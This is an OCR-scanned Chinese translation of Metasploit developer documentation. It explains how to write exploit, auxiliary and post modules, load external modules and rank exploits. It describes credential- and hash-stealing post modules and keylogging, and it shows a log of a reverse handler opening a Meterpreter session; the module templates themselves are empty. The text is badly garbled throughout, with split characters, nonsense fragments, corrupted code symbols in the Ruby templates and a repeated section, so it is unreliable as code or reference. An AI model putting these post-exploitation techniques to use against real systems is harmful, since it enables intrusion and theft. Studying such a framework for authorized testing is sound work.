过 该 target 方 法 进行 检索 。 Payloads 字 段 指定 有 效 载荷 应 该 如 何 被 编码 和 生成 。 您 可 以 指 

定 : Space，SaveRegisters，Prepend，PrependEncoder，BadChars，Append ， 
AppendEncoder > MaxNops > MinNops > Encoder > Nop > EncoderType ° 

EncoderOptions > ExtendedOptions > EncoderDontFallThrough ° DisclosureDate X 25 7 il 
被 公开 披露 时 ， 格 式 ::"M D Y". 例子 : "Apr 04 2014" 你 的 漏洞 也 应 该 有 一 个 check 方 法 来 支持 
check 命 令 ,但 是 这 是 可 选 的 ,因为 如 果 这 是 不 可 能 的 。 最 后 ， 这 个 exploit 方 法 就 像 你 的 main 方 
法 。 开 始 在 那里 写 你 的 代码 。 


基本 的 git 命 令 


Metasploit 不 再 使 用 svn 进 行 源 代码 管理 ， 而 是 使 用 git， 所 以 了 解 git 的 一 些 技巧 会 有 很 长 的 路 
要 走 。 我 们 不 是 在 这 里 教 你 git 是 多 么 的 棒 , 我 们 知道 它 有 一 个 学 习 曲 线 ， 新 的 用 户 犯 错误 并 不 
奇怪 。 每 隔 一 段 时 间 ， 你 的 git* 翅 火 "就 会 踢 过 来 ， 我 们 理解 。 不 过 ， 重 要 的 是 要 利用 分 支 。 
每 次 创建 模块 或 对 现 有 代码 进行 一 些 更 改 时 ， 都 不 应 该 在 默认 主 分 支 上 这 样 做 。 为 什么 ? 
为 当 你 使 用 msfupdate 更 新 你 的 Metasploit 仓 库 的 工具 时 ， 它 会 在 合并 这 些 改变 之 前 做 一 个 git 
reset， 你 就 要 和 你 所 有 的 代码 说 再 见 。 


人 们 倾向 于 做 的 另 一 个 错误 是 在 提交 拉 取 请 求 之 前 对 主 分 支 进行 了 任何 更 改 .这 是 个 坏 主意 ， 
为 很 可 能 你 提交 了 你 不 打工 改变 的 其 他 垃圾 ， 或 者 你 可 能 会 要 求 我 们 合并 其 他 不 必要 的 提交 
历史 .只 要 一 次 提交 就 行 了 .感谢 你 提交 模块 到 社区 ,但 不 感谢 你 提交 其 他 不 必要 的 提交 历史 . 


所 以 作为 一 种 习惯 ， 当 你 想 要 做 出 新 的 东西 或 者 改变 某 些 东西 的 时 候 ， 从 最 新 的 主 分 支 分 又 
一 个 新 的 分 支 开 始 ， 首 先 , 先 确 认 你 是 master 分 支 ,如 果 你 使 用 git status , 它 将 会 告诉 你 现在 
所 在 分 支 


$ git status 
# On branch upstream-master 
nothing to commit, working directory clean 


好 的 , 接 下 来 git pull 从 metasploit 下 载 最 新 更 改 


$ git pull 
Already up-to-date. 


现在 ,你 准备 开始 一 个 新 分 支 了 .在 这 种 情况 ,我 们 新 分 支 的 名 字 是 "my_awesome branch": 


$ git checkout -b my awesome module 
Switched to a new branch 'my awesome module' 


现在 你 可 以 继续 前 进 添加 一 个 模块 .确认 他 在 合适 的 路 径 


$ git add [module path] 


你 决定 保存 更 改 时 ， 提 交 (如 果 只 有 一 个 模块 ， 你 也 可 以 这 样 做 ，git commit -a 所 以 你 不 
块 路 径 ， od 味 着 所 有 ) 


$ git commit [module path] 


A ， 推送 您 将 您 的 代码 上 传 到 您 的 远程 awesome_branch”。 您 必须 推 
您 的 更 改 才能 提交 拉 取 请 求 ， 或 与 互联 网 上 的 其 他 人 共 


$ git push origin my_awesome_branch 


如 何 开始 写 一 个 辅助 模块 


Metasploit 以 其 免费 的 开源 exploit- 弹出 式 shell 模 块 而 闻名 。 但 实际 上 ， 渗 透 测 试 人 员 更 多 依 
赖 于 辅助 模块 ， 而 且 通 常 可 以 在 不 触发 单个 漏洞 的 情况 下 完成 成 功 的 渗透 。 他 们 更 方便 ， 对 
失败 的 惩罚 通常 要 低 得 多 。 专 业 人 员 其 实 更 喜欢 辅助 模块 。 关于 辅助 模块 的 另 一 个 有 趣 的 事 
实 是 ， CT SEDIS Sd Sua 主要 区 别 在 于 它 是 如 何在 Metasploit 中 定义 的 : 如 
果 一 个 模块 弹出 一 个 shell， 这 是 一 个 漏洞 。 如 果 不 是 ， 即 使 它 利用 了 漏洞 ， 它 仍然 属于 辅助 
类 别 。 所 以 你 看 ， 如 果 你 是 一 个 辅助 模块 热爱 者 ， 你 是 来 对 了 。 


计划 你 的 模块 


就 像 编 写 一 个 软件 一 样 ， 在 你 开始 写 代码 之 前 ， 你 应 该 对 你 的 辅助 模块 有 一 个 清晰 明确 的 目 
标 。 在 单个 模块 中 具有 多 个 功能 从 来 就 不 是 一 个 好 主意 。 你 应 该 把 它 分 解 成 多 个 模块 。 你 也 

应 该 考虑 你 的 模块 在 不 同情 况 下 的 表现 。 例 如 ， i i EN 那么 如 
果 使 用 Nginx， 会 发 生 什 么 情况 ? 它 会 出 错 并 留 下 错误 回溯 ? 如 果 是 这 样 ， 你 应 该 妥善 处 理 。 
您 的 模块 是 否 需要 目标 机 器 Ion 会 发 生 什 么 ? 它 会 再 次 出 错 吗 ? 最 
重要 的 是 ， 确 保 彻底 测试 你 的 模块 。 在 重要 的 战斗 中 发 现 问题 总 是 很 难堪 ， 这 可 能 会 让 你 付 
出 代价 。 


辅助 模块 的 主要 类 别 


一 般 来 说 ， 辅 助 模块 是 根据 他 们 的 行为 分 类 的 ， 但 是 这 有 点 不 一 致 ， 所 以 你 只 需要 用 最 好 的 
判断 ， 找 出 最 合适 的 模块 。 以 下 是 一 些 常见 的 列表 : 
X3 描述 


admin 在 目标 机 器 上 修改 ， 操 作 或 操作 某 些 东西 的 模块 
analyze ”我 们 最 初 为 需要 分 析 时 间 的 密码 破解 模块 创建 了 这 个 文件 夹 。 


client 我 们 最 初 为 了 社会 工程 目的 创建 了 SMTP 模 块 的 这 个 文件 来。 

dos 不 言 自明 拒绝 服务 模块 。 

f 如 果 你 的 模块 是 fuzz， 这 就 是 它 所 属 的 地 方 。 确 保 根 据 协议 将 其 放置 在 正确 的 
uzzers 子 目录 中 。 


gather ”从 单个 目标 收集 或 枚 举 数 据 的 模块 。 


使 用 Msf::Auxiliary::Scanner 的 模块 几乎 总 是 在 这 里 。 确 保 根据 协议 将 其 放置 
在 的 正确 的 子 目 录 。 


server 及 务 器 的 模块 


sniffer 噢 探 器 的 模块 。 


scanner 


实际 上 在 辅助 目录 中 还 有 几 个 目录 ， 但 这 就 是 灰色 区 域 的 地 方 。 是 非常 欢迎 你 来 看 的 


The Msf::Auxiliary::Scanner mixin 


这 Msf::Auxiliary::Scanner mixin 在 辅助 模块 大 量 使 用 。 所 以 我 们 不 妨 说 说 ， 就 在 这 里 。mixin 
允许 你 能 够 测试 一 系列 主机 ， 而 且 是 多 线程 的 。 要 使 用 它 ， 首 先 你 需要 在 你 的 Metasploit3 类 
的 范围 内 包含 mixin 


include Msf::Auxiliary::Scanner 


包含 这 个 mixin 的 时 候 ， 一 些 新 的 东西 会 被 添加 到 你 的 模块 中 。 您 将 拥有 一 个 名 

为 “RHOSTS” 的 新 数据 存储 选项 ， 该 选项 允许 用 户 2 定 多 个 主机 。 有 一 个 新 的 "THREADS” 选 
项 ， 它 允许 执行 期 间 运 行 的 线程 数量 。 跟 踪 扫 描 进度 的 还 

有 “ShowProgress” 和 “ShowProgressPercent” 通常 ， 辅 助 模块 的 主 方法 是 “def run” ° 12 4 th 
使 Msf::Auxiliary::Scanenrmixin 时 ， 你 需要 使 用 def run_host(ip)。IP 参 数 是 目标 机 器 。 


模板 
这 是 一 个 辅助 模块 的 最 基本 的 例子 。 我 们 将 更 多 地 解释 需要 填充 的 字段 : 


BH 
# This module requires Metasploit: http://metasploit.com/download 
4 Current source: https://github.com/rapid7/metasploit-framework 
THÉ 


require 'msf/core' 
class MetasploitModule « Msf::Auxiliary 


def initialize(info = {}) 
super(update info(info, 


'Name' -» 'Module name', 
'Description' => %q{ 
Say something that the user might want to know. 
3 
'Author' => [ 'Name' ], 
'License' -» MSF LICENSE 
)) 
end 
def run 
# Main function 
end 
end 


该 名 称 字 段 可 以 以 供应 商 的 名 称 开头 ， 但 是 是 可 选 的 。 然 后 基本 上 描述 它 是 什么 。 例 

如 : "Dolibarr ERP/CRM Login Utility" 在 Description 字 段 应 该 解释 模块 做 什么 ， 什 么 事情 要 留 
意 ， 具 体 要 求 ， 多 多 益 善 。 目 标 是 让 用 户 了 解 他 所 使 用 的 内 容 ， 而 不 需要 实际 读 取 模块 的 源 
代码 并 找 出 结果 。 相 信 我 ， 他 们 中 的 大 多 数 人 不 会 。 Author 字段 是 你 的 名 字 。 格 式 应 该 是 “名 
称 ”。 如 果 你 想 在 那里 有 你 的 Twitter， 留 下 它 作 为 一 个 评论 ， 例 如 :“ 名 称 并 handle” 


因为 Msf::Auxiliary::Scanner mixin 非 常 受 欢 迎 ， 所 以 我 们 觉得 你 也 需要 一 个 模板 。 在 这 里 


THE 

# This module requires Metasploit: http://metasploit.com/download 
# Current source: https://github.com/rapid7/metasploit-framework 
THE 

require 'msf/core' 

class MetasploitModule « Msf::Auxiliary 


include Msf::Auxiliary::Scanner 


def initialize(info = {}) 
super(update info(info, 


'Name' -» 'Module name', 
'Description' => %q{ 
Say something that the user might want to know. 
3 
'Author' => [ 'Name' ], 
'License' -» MSF LICENSE 
)) 
end 


def run_host(ip) 
# Main method 
end 


end 


基本 的 git 命 令 


Metasploit 不 再 使 用 Svn 进 行 源 代码 管理 ， 而 是 使 用 git， 所 以 了 解 git 的 一 些 技巧 会 有 很 长 的 路 
要 走 。 我 们 不 是 在 这 里 教 你 git 是 多 么 的 棒 , 我 们 知道 它 有 一 个 学 习 曲 线 ， 新 的 用 户 犯错 误 并 不 
奇怪 。 每 隔 一 段 时 间 ， 你 的 git" 怒 火 "就 会 踢 过 来 ， 我 们 理解 。 不 过 ， 重 要 的 是 要 利用 分 支 。 
每 次 创建 模块 或 对 现 有 代码 进行 一 些 更改 时 ， 都 不 应 该 在 默认 主 分 支 上 这 样 做。 为 什么 ? 
为 当 你 使 用 msfupdate 更 新 你 的 Metasploit 仓 库 的 工具 时 ， 它 会 在 合并 这 些 改 变 之 前 做 一 个 git 
reset， 你 就 要 和 你 所 有 的 代码 说 再 见 。 


人 们 倾向 于 做 的 另 一 个 错误 是 在 提交 拉 取 请 求 之 前 对 主 分 支 进 行 了 任何 更 改 . 这 是 个 坏 主 意 ， 
为 很 可 能 你 提交 了 你 不 打算 改变 的 其 他 垃圾 ， 或 者 你 可 能 会 要 求 我 们 合并 其 他 不 必要 的 提交 
历史 .只 要 一 次 提交 就 行 了 .感谢 你 提交 模块 到 社区 ,但 不 感谢 你 提交 其 他 不 必要 的 提交 历史 ， 

所 以 作为 一 种 习惯 ， 当 你 想 要 做 出 新 的 东西 或 者 改变 某 些 东西 的 时 候 ， 从 最 新 的 主 分 支 分 又 


一 个 新 的 分 支 开 始 ， 首 先 , 先 确 认 你 是 master 分 支 ,如 果 你 使 用 git status , 它 将 会 告诉 你 现在 
所 在 分 支 


$ git Status 
# On branch upstream-master 
nothing to commit, working directory clean 


好 的 , 接 下 来 git pull 从 metasploit 下 载 最 新 更 改 


$ git pull 
Already up-to-date. 


现在 ,你 准备 开始 一 个 新 分 支 了 .在 这 种 情况 ,我 们 新 分 支 的 名 字 是 "my_awesome_ branch": 


$ git checkout -b my awesome module 
Switched to a new branch 'my awesome module' 


现在 你 可 以 继续 前 进 添加 一 个 模块 .确认 他 在 合适 的 路 径 


$ git add [module path] 


你 决定 保存 更 改 时 ， 提 交 (如 果 只 有 一 个 模块 ， 你 也 可 以 这 样 做 ，git commit -a 所 以 你 不 
ecu 注意 2s 


$ git commit [module path] 


ne ， 推 送 您 的 更 改 ， 将 您 的 代码 上 传 到 您 的 远程 oes awesome branch" » f ws fi 4È 
您 的 更 改 才 能 提交 拉 取 请 求 ， 或 与 互联 网 上 的 其 他 人 共 


$ git push origin my_awesome_branch 


如 何 开 始 写 一 个 post 模 块 


post 模 块 开发 对 您 的 编程 技能 是 一 个 挑战 。 这 不 像 写 一 个 基于 内 存 损坏 的 攻击 ， 从 技术 上 说 ， 
通常 是 制造 恶意 输入 - 一 个 字符 串 。post 模 块 更 多 的 是 关于 正确 的 模块 设计 ，Ruby 和 
Metasploit 库 的 实用 知识 。 这 也 是 一 个 非常 有 价值 的 技能 ， 因 为 如 果 在 弹出 一 个 shell 之 后 你 不 
知道 该 怎么 做 ， 活 透 测试 的 重点 是 什么 ? 另外 ， 如 果 一 个 模块 不 工作 ? 你 是 否 愿 意 等 待 几 

天 ， 几 周 其 至 几 个 月 的 时 间 让 其 他 人 为 你 解决 ?可 能 不 会 。 如 果 你 自己 知道 该 怎么 做 ， 那 么 
你 可 以 更 早 地 修复 它 ， 继 续 你 的 渗透 ， 做 更 多 的 事情 。 所 以 学 习 post 模 块 开发 ! 这 对 你 和 你 的 
事业 都 有 好 处 


计划 你 的 模块 


就 像 编写 一 个 软件 一 样 ， 在 你 开始 写 代 码 之 前 ， 你 应 该 有 一 个 清晰 明确 的 目标 ， 就 是 你 的 post 
模块 做 什么 。 在 单个 模块 中 具有 多 个 功能 从 来 就 不 是 一 个 好 主意 。 例如 : 盗 取 网 络 配置 文件 ， 
窃取 密码 ， 哈 希 值 ，shell 历 史记 录 等 。 相 反 ， 您 应 该 将 其 分 解 为 多 个 模块 。 您 还 应 该 考虑 要 
支持 的 会 话 类 型 : meterpreter 或 shell。 理 想 情况 下 ， 两 者 都 支持 。 但 是 如 果 你 必须 在 两 者 之 
间 进 行 选择 ， 那 么 在 Windows 上 你 应 该 选择 Windows Meterpreter。 在 Linux 上 ，shell 会 话 类 
型 比 Linux Meterpreter 更 为 强大 ， 但 希望 在 不 久 的 将 来 会 改变 。 对 于 没有 Meterpreter 的 平 

台 ， 显 然 你 唯一 的 选择 是 一 个 shell。 另 一 个 重要 的 事情 是 考虑 你 的 模块 如 何在 不 同 的 发 行 版 / 
系统 上 执行 。 例 如 你 想 在 linux 和 运行 一 个 ifconfig 命令 .在 Ubuntu 只 需要 简单 的 运 

行 ifconfig 就 可 以 了 .但 是 在 不 同 的 linux 发 行 版 可 能 不 知道 你 在 做 什么 .所 以 你 必须 更 具体 一 
些 ， 而 不 是 直接 /sbin/ifconfig ° Æ C:\WINDOWS\ 还 是 C:NWinNT ?这 是 两 个 ,是 不 

是 C:\Documents and Settings\[User name] 或 者 C:\Users\[User name] .都 取决 与 Window 版 本 . 
更 好 的 解决 方案 是 使 用 环境 变量 总 是 做 你 的 准备 ,， 并 包含 你 可 以 想到 的 场景 。 而 最 重要 的 
是 ， 让 你 的 虚拟 机 测试 


post 模 块 的 类 别 


post 模 块根 据 其 行为 进行 分 类 。 例 如 ， 如 果 收 集 数据 ， 自 然 会 进入 gather 类 别 。 如 果 它 添加 / 
更 新 /或 删除 用 户 ， 它 属于 manage ? 这 里 有 一 个 列表 作为 参考 : 


ETT 描述 
gather 涉及 数据 收集 /收集 / 枚 举 的 模块 。 
gather/credentials — £7 J& 5645 hJ 48 3 o 
gather/forensics 涉及 取证 数据 收集 的 模块 。 
修改 /操作 /操作 系统 上 的 某 些 东西 的 模块 。 会 话 管理 相关 的 任务 ， 


[oS 如 迁移 ， 注 入 也 在 这 里 。 

ee 这 些 模块 将 帮助 您 在 侦察 方面 了 解 更 多 的 系统 信息 ， 而 不 是 关于 数 
EAR o JHA gather 类 型 模块 不 一 样 。 

wlan 用 于 WLAN 相 关 任 务 的 模块 。 
这 是 不 赞成 的 ， 但 由 于 受 欢 迎 ， 模 块 仍然 在 那里 。 这 曾经 是 特权 升 

escalate 级 模块 的 地 方 。 所 有 权限 升级 模块 不 再 被 视 为 后 期 模块 ， 它 们 现在 
xt exploit 。 

capture 涉及 监控 数据 收集 的 模块 。 例 如 : 密 钥 记录 。 

会 话 对 象 


所 以 你 知道 魔 戒 怎么 样 ， 人 们 完全 沉迷 于 一 环 ? 那么 ,这 就 是 会 话 对 象 ,你 不 能 没有 的 一 个 对 象 . 
所 有 的 post 模 块 和 其 他 相关 的 mixin 基 本 上 都 是 建立 在 会 话 对 象 之 上 的 ， 因 为 它 知道 被 入 侵 主 
机 的 所 有 信息 ， 并 允许 你 命令 它 。 


您 可 以 使 用 该 session 方法 来 访问 会 话 对 象 或 其 别名 client 。 与 irb 交 互 的 最 佳 方式 是 通 


过 irb 命令 ， 以 下 是 一 个 例子 : 


msf exploit(handler) > run 


] Started reverse handler on 192.168.1.64:4444 

] Starting the payload handler... 

] Sending stage (769536 bytes) to 192.168.1.106 

] Meterpreter session 1 opened (192.168.1.64:4444 -» 192.168.1.106:55157) at 2014-07 
1 17:59:36 -0500 


meterpreter » irb 


[*] Starting IRB shell 
[*] The 'client' variable holds the meterpreter client 


>> session.class 
-» Msf::Sessions::Meterpreter x86 Win 


在 这 一 点 上 ， 你 有 权力 使 用 他 们 。 但 请 注意 ， 上 面 的 例子 是 一 个 
Msf::Sessions::Meterpreter x86 Win 对 象 。 实 际 上 还 有 几 个 不 同 的 东西 : 

command shell.rb > meterpreter php.rb > meterpreter java.rb > meterpreter x86 linux.rb 等 
等 。 每 个 行为 都 有 所 不 同 ， 所 以 实际 上 很 难 解释 它们 ， 但 是 它们 是 在 lib/msf/base/sessions/ 
目录 下 ,所 以 你 是 可 以 看 到 它们 是 怎么 工作 的 ,或 者 你 可 以 试 一 下 因为 你 已 经 在 irb 命 令 行 了 . 在 
ruby 有 两 个 方便 调试 对 象 目 的 的 对 象 方法 .第 一 个 是 methods , 它 将 会 列 出 对 象 中 全 部 公开 和 受 
防护 的 方法 . 


session.methods 


另 一 个 是 inspect， 它 返回 一 个 对 象 的 人 类 可 读 的 字符 串 : 


session.inspect 


可 以 查看 其 他 当前 的 post 模 块 ， 并 查看 他 们 如 何 使 用 其 会 话 对 象 。 


Msf::Post Mixin 


正如 我 们 所 解释 的 ， 大 多 数 post 模 块 mixin 是 建立 在 会 话 对 象 之 上 的 ， 而 且 它 还 有 很 多 。 但 
是 ， 有 一 个 你 显然 不 能 没有 的 一 个 Msf: Post .mixin。 当 你 用 这 个 mixin 创 建 一 个 post 模 块 时 ， 


很 多 


其 他 的 mixin 也 已 经 包含 在 各 种 场景 中 ， 更 具体 一 些 : 


msf/core/post/common - post 模 块 使 用 的 通用 方法 ， 例 如 cmd exec 

msf/core/post_mixin - 跟踪 会 话 状态 。 

msf/core/post/file - 文件 系统 相关 的 方法 

msf/core/post/webrtc - 使 用 WebRTC 与 目标 机 器 的 摄像 头 进 行 交互 

msf/core/post/linux - 通常 不 是 很 多 在 这 , 只 是 特定 与 inux 的 get sysinfo 和 is root ? 
msf/core/post/OSX - get sysinfo * get users ， get system accounts ， get groups fl 
于 操作 的 目标 计算 机 的 网 络 摄像 头 的 方法 。 

msf/core/post/solaris - 非常 像 linux mixin。 相 同 的 方法 ， 但 是 是 对 于 Solaris。 
msf/core/post/unix - get users get groups enum user directories 
msf/core/post/windows -大 部 分 的 开发 时 间 都 花 在 这 里 。Windows 帐 户 管 理 ， 事 件 日 志 ， 
文件 信息 ，Railgun，LDAP ，netapi，powershell， 注 册 表 ，wmic， 服 务 等 。 


模板 


在 这 里 我 们 有 一 个 post 模 块 模板 正如 你 所 看 到 的 ， 有 一 些 需要 填写 的 必 卉 字段 。 我 们 将 解释 


人 


每 个 : 


HH 


# This module requires Metasploit: http://metasploit .com/download 


# Current source: https://github.com/rapid7/metasploit - framework 
THE 


require 'msf/core' 
class MetasploitModule « Msf::Post 


def initialize(info={}) 
super(update info(info, 


'Name' -» '[Platform] [Module Category] [Software] [Function]', 
'Description' => %q{ 
Say something that the user might want to know. 
3 
'License' -» MSF LICENSE, 
'Author' -» [ 'Name' ], 
'Platform' => [ 'win', 'linux', 'osx', 'unix', 'bsd' ], 
'SessionTypes' => [ 'meterpreter', 'shell' ] 
)) 
end 
def run 
# Main method 
end 
end 


Name 字段 应 该 以 平台 开头 ,就 像 Multi Windows, Linux, OS X. 接 下 来 是 模块 类 别 ,例如 Gather, 
Manage, Recon, Capture, Wlan.. 接 下 来 是 软件 的 名 字 , 最 后 几 个 单词 描述 这 个 模块 的 功能 , 例 
ber Gather RndFTP aoe: Enumeration". 在 pescription 字段 应 该 解释 模块 做 什 

， 什么 事情 要 留意 ， 上 有 具体 要 求 ， 多 多 益 善 。 目 标 是 让 用 户 了 解 他 所 使 用 的 内 容 ， 而 不 需要 
实际 读 取 模 块 的 源 代码 并 找 出 结果 。 ied 信 我 ， 他 们 中 的 大 多 数 人 不 会 。 author 字段 是 你 的 名 
字 。 格 式 应 该 是 "名称 ”。 如 果 你 想 在 那里 有 你 的 Twitter ， 留 下 它 作 为 一 个 评论 ， 例 如 :名 称 太 
handle" 该 Platform 字段 表示 所 支持 的 平台 ， 例 如 : win, linux, osx, unix, bsd. 这 
个 Session type 字段 应 该 是 meterpreter 或 者 shell, 你 应 该 尝试 支持 更 多 最 后 ， 这 个 run 方法 
就 像 你 的 main 方 法 。 开 始 在 那里 写 你 的 代码 


基本 的 git 命 令 


和 如 何 开始 写 exploit 的 一 样 
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载 入 外 部 模块 


如 果 您 正在 编写 或 收集 不 属于 标准 分 发 版 的 Metasploit 模 块 ， 那 么 您 需要 一 种 方便 的 方式 在 
Metasploit 中 加 载 这 些 模块 。 不 要 担心 ， 使 用 Metasploites Seal LR RR 
4& $HOME/.msf4/modules 是 非常 简单 的 ? 而 且 还 有 一 些 注 意 事 项 


镜像 丨 正 的 Metasploit 模 块 路 径 


您 必须 首先 建立 一 个 符合 Metasploit 对 路 径 名 称 预期 的 目录 结构 。 这 通常 意味 着 你 应 该 首先 创 
建 一 个 exploits 目录 结构 ， 如 下 所 示 : 


mkdir -p $HOME/ .msf4/modules/exploits 


你 正在 使 用 auxiliary 或 post 模块 ， 或 正在 写 payloads .你 将 会 想 要 mkdir 它 


创建 一 个 适当 的 类 别 


模块 按 ( 有 点 任意 ) 分 类 排序 。 以 是 an 我 通常 使 用 test 或 private ， 
但 是 如 果 您 正在 开发 一 个 模块 ， 想 将 它 提供 给 Metasploit 发 行 版 ， 您 将 需要 镜像 监 正 的 模块 路 
径 。 例 如 


mkdir -p $ HOME /.msf4/modules/exploits/windows/fileformat 


假设 你 正在 开发 Windows 文 件 格式 的 exploit。 


创建 模块 
一 旦 你 有 一 个 目录 放置 它 ， 随 时 下 载 或 开始 编写 你 的 模块 。 


测试 全 部 


如 果 您 已 经 运行 了 msfconsole， 请 使 用 reload all 命 令 来 获取 新 模块 。 如 果 没 有 ， 只 需 局 动 
msfconsole， 他 们 就 会 自动 提取 。 如 果 你 想 测试 一 些 通用 的 东西 ， 我 有 一 个 模块 放出 来 ， 在 
这 里 https://gist.github.com/todb-r7/5935519. 所 以 让 我 们 试 试 看 


mkdir -p $HOME/.msf4/modules/exploits/test 
curl -Lo -/.msf4/modules/exploits/test/test module.rb https://gist.github.com/todb-r7/ 
5935519/raw/17f7e40ab9054051ci1f7e0655c6f8c8a1787d4f5/test module.rb 
todb@ubuntu:~$ mkdir -p $HOME/.msf4/modules/exploits/test 
todbQubuntu:-$ curl -Lo -/.msf4/modules/exploits/test/test module.rb https://gist.gith 
ub.com/todb-r7/5935519/raw/6e5d2da61c82b0aa8cec36825363118e9dd5f86b/test module.rb 

% Total % Received % Xferd Average Speed Time Time Time Current 

Dload Upload Total Spent Left Speed 

100 1140 © 1140 0 0 3607 Ql sagas fan Ssogechiss aagoetes TANS 


然后 在 我 的 msfconsole 窗 口 


msf > reload all 
[*] Reloading modules from all module paths... 
IIIIII dTb.dTb eere 
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I love shells --egypt 


-[ metasploit v4.6.2-2013052901 [core:4.6 api:1.0] 
* -- ---[ 1122 exploits - 707 auxiliary - 192 post 
* -- ---[ 307 payloads - 30 encoders - 8 nops 


msf » use exploit/test/test module 
msf exploit(test module) » info 


Name: Fake Test Module 
Module: exploit/test/test module 
Version: 0 
Platform: Windows 
Privileged: No 
License: Metasploit Framework License (BSD) 
Rank: Excellent 


Provided by: 
todb <todb@metasploit.com> 


Available targets: 
Id Name 


0 Universal 


Basic options: 
Name Current Setting Required Description 


DATA Hello, world! yes The output data 
Payload information: 
Description: 

If this module loads, you know you're doing it right. 


References: 
http://cvedetails.com/cve/1970-0001/ 


msf exploit(test module) » exploit 
[*] Started reverse handler on 192.168.145.1:4444 


[*] Hello, world! 
msf exploit(test module) » 


故障 排除 
这 就 是 它 的 全 部 。 人 们 ( 包 我 自己 ) 到 的 最 常见 的 问题 是 


e 试图 在 sHoME/.msf4/modules/ 创建 一 个 模块 这 是 行 不 通 的 .因为 你 需要 指定 它 是 一 个 
exploit 还 是 一 个 payload 或 者 什么 的 。 检 
查 1s /opt/metasploit/apps/pro/msf3/modules/ (或 者 你 安装 Metasploit 的 地 方 ) 

e 试图 在 $HOME/.msf4/modules/auxiliary/ 创 建 一 个 模块 这 是 行 不 通 的 ,因为 您 至 少 需要 一 


个 分 类 . 它 可 以 是 新 的 ， 像 auxiliary/0day/ 或 现 有 的 一 样 14% auxiliary/scanner/scada/ 

e 试图 在 $HOME/.msf4/modules/exploit 或 $HOME/.msf4/posts/ 创 建 一 个 模块 注意 目录 名 
称 的 复数 它们 是 不 同 的 Exploits, payloads, encoders, 和 nops 是 负数 . auxiliary 和 post 
是 单数 


Metasploit 社 区 和 Pro 版 本 


请 注意 ，Metasploit Community Edition 的 $HOME 目 录 将 会 是 root 而 不 是 您 自己 的 用 户 目 录 . 
所 以 如 果 您 希望 模块 出 现在 Metasploit CE (or Express, or Pro) web Uls. 您 将 需要 讲 您 的 外 部 
模块 放 到 /root/.msfa/modules 。 当 然 ， 这 意味 着 您 需要 root 权 限 访 问 那 台 机 器 ， 但 是 ， 您 是 
Metasploit 用 户 ， 所 以 不 应 该 太 难 。 


另外 请 注意 ， 如 果 您 的 模块 未 显示 在 Web UI 中 ， 则 应 重新 启动 Pro 服 务 。 


window 


对 于 Windows 用 户 来 说 ,除了 从 Web GUI 访问 模块 外 ， 以 上 都 是 一 样 。 可 悲 的 是 ， 你 有 一 点 点 
运气 不 好 ，Windows 上 的 模块 加 载 路 径 有 一 些 限 制 ， 并 且 不 允许 使 用 外 部 模块 。 但 是 ， 基 于 
Console2 的 Metasploit 控 制 台 (Start > Programs > Metasploit > Metasploit Console) 可 以 很 好 
地 工作 。 


新 的 mixin 和 协议 


任何 需要 更 改 核 心 库 函 数 的 模块 ， 比 如 新 的 协议 解析 器 或 其 他 库 mixin 模 块 .是 不 会 为 你 这 样 做 
的 .你 将 会 在 你 的 模块 中 到 处 试图 加 载 这 些 类 。 在 几乎 所 有 情况 下 都 可 以 编写 完全 自 包 含 的 模 
块 (感谢 Ruby 的 开放 式 体系 结构 ) ， 但 是 之 后 这 些 模块 几乎 总 是 会 被 重 构 ， 以 使 其 他 模块 可 
使 用 


在 这 种 情况 下 ， 最 好 使 用 像 开 发 分 支 这 样 合适 的 GitHub checkout 来 处 理 模 块 - 请 参阅 开发 环 
境 设置 文档 ， 了 解 更 多 信息 


最 后 的 警告 


如 果 你 正在 加 载 新 的 令 人 兴奋 的 的 Metasploit 模 块 ， 那 么 知道 这 些 东西 往往 可 以 访问 任何 你 有 
权 访 问 的 东西 ; 如 果 你 使 用 root, 更 是 如 此 . Metasploit 模 块 是 纯 文本 的 Ruby， 所 以 你 可 以 阅读 
它们 - 但 请 小 心 ， 只 添加 来 自 可 信 来 源 的 外 部 模块 ; 不 要 只 是 抓 住 你 在 互联 网 上 看 到 的 任何 旧 
东西 ， 因 为 你 可 能 会 发 现 自己 在 短 时 间 内 中 了 后 门 (或 更 糟 ) 。 


exploit ranking 


根据 对 目标 系统 的 潜在 影响 ， 每 个 利用 模块 都 被 分 配 一 个 rank。 用 户 可 以 根据 rank 对 exploit 进 
行 搜索 ， 分 类 和 优先 级 排序 。 ranking 是 通过 在 模块 类 声明 在 上 方 添加 一 个 rank 常 量 实现 的 
class MetasploitModule < Msf::Exploit 
Rank - LowRanking 
def initialize(info={}) 
PM T 


end 


这 个 ranking 的 值 是 下 面 的 其 中 一 个 , 按 可 靠 性 降序 排列 


Ranking Description 


这 个 漏洞 永远 不 会 使 服务 谣 溃 。 这 是 SQL 注入 ，CMD 执 行 ,RFLLFI 
ExcellentRanking ， 等 的 情况 。 没 有 典型 的 内 存 损坏 漏洞 应 该 给 这 个 rank， 除 非 有 特殊 
情况 


exploit 有 一 个 默认 的 目标 和 自动 检测 目标 ， 或 者 在 版 本 检查 后 使 用 


GreatRanking 特定 于 应 用 程序 的 返回 地 址 。 
P it 具有 默认 目标 ， 这 是 这 种 类 型 的 软 英语 ， 3 H4 
GoodRanking 该 exploit 具 有 默认 目标 ， 这 是 这 种 类 型 的 软件 〈 英 语 ， 桌 面 应 用 程 


序 的 Windows 7，2012 的 服务 器 等 ) 的 “常见 情况 ”。 


这 个 漏洞 是 可 靠 潍 ”1 二 7 — WAX ud , 能 X S ay 2 
NormalRanking RENE 但 取决 于 一 个 特定 的 版 本 ， 不 能 (或 不 ) TE 


AverageRanking ”exploit 通 常 是 不 可 靠 或 者 很 难 被 利用 的 。 


LowRanking IDE G AGE» exploit LF AAT HRA ET 5076 RA A) 


这 个 exploit 不 稳定 或 难以 exploit， 基 本 上 是 一 个 DoS。 当 模块 没有 用 
ManualRanking 处 ， 除 非 用 户 特别 配置 (例如 exploit /unix/webapp/php_eval), 这 个 
排名 也 被 使 用 。 


rank 值 是 可 用 的 模块 类 对 象 以 及 实例 : 


modcls = framework.exploits["windows/browser/ie createobject"] 
modcls.rank # => 600 
modcls.rank_to_s # => "excellent" 


mod = modcls.new 
mod.rank # => 600 
mod.rank_to_s # => "excellent" 


Metasploit 模 块 引 用 标识 符 


Metasploit 模 块 中 的 引用 是 与 模块 相关 的 信息 的 来 源 。 这 可 以 链接 到 漏洞 咨询 ， 新 闻 文 章 ， 关 
于 模块 使 用 的 特定 技术 的 博客 文章 ， 特 定 推 文 等 。 越 多 越 好 。 但 是 ， 您 不 应 该 将 其 用 作 广 告 


形式 。 


